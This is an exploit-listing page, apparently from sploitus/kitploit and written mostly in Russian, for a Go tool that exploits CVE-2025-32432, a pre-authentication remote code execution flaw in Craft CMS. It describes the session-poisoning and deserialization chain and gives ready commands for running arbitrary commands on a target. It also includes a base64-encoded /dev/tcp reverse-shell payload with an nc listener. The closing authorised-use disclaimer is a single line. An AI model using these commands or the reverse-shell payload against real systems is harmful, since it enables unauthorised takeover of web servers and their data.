## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-HELTONPOJO-CVE-2025-32432
# CVE-2025-32432 — Craft CMS Pre-Auth RCE
Эксплойт для удалённого выполнения кода без аутентификации в Craft CMS, написанный на Go.
Вдохновлён оригинальной работой c0gnit00.
## Как это работает
1. Получает PHP-сессию и CSRF-токен через `GET /admin/login`
2. Отравляет файл PHP-сессии, внедряя PHP-код в строку запроса
3. Запускает десериализацию через `assets/generate-transform`, чтобы подключить и выполнить отравленный файл
## Использование
root@kitploit:~
go run main.go -u <url> -c <comando>
Flag| Описание| Обязательный
---|---|---
`-u`| Целевой URL (например: `http://target.com`)| Да
`-c`| Команда для выполнения (например: `id`, `whoami`)| Да
## Пример
root@kitploit:~
# Sem Asset ID (brute-force automático)
go run main.go -u http://target.com -c whoami
## Reverse Shell
**1\. Сгенерируйте payload в base64 с вашим IP и портом:**
root@kitploit:~
echo 'exec sh -i >& /dev/tcp/SEU_IP/4444 0>&1' | base64
**2\. Запустите listener:**
root@kitploit:~
nc -lvnp 4444
**3\. Запустите эксплойт с payload:**
root@kitploit:~
go run main.go -u http://target.com -c "echo 'ZXhlYyBzaCAtaSA+JiAvZGV2L3RjcC9TRVVfSVAvNDQ0NCAwPiYxCg==' | base64 -d | bash"
> Замените значение base64 на сгенерированное в шаге 1 с вашим реальным IP.
## Предупреждение
Для использования исключительно в авторизованных средах и контролируемых тестах безопасности.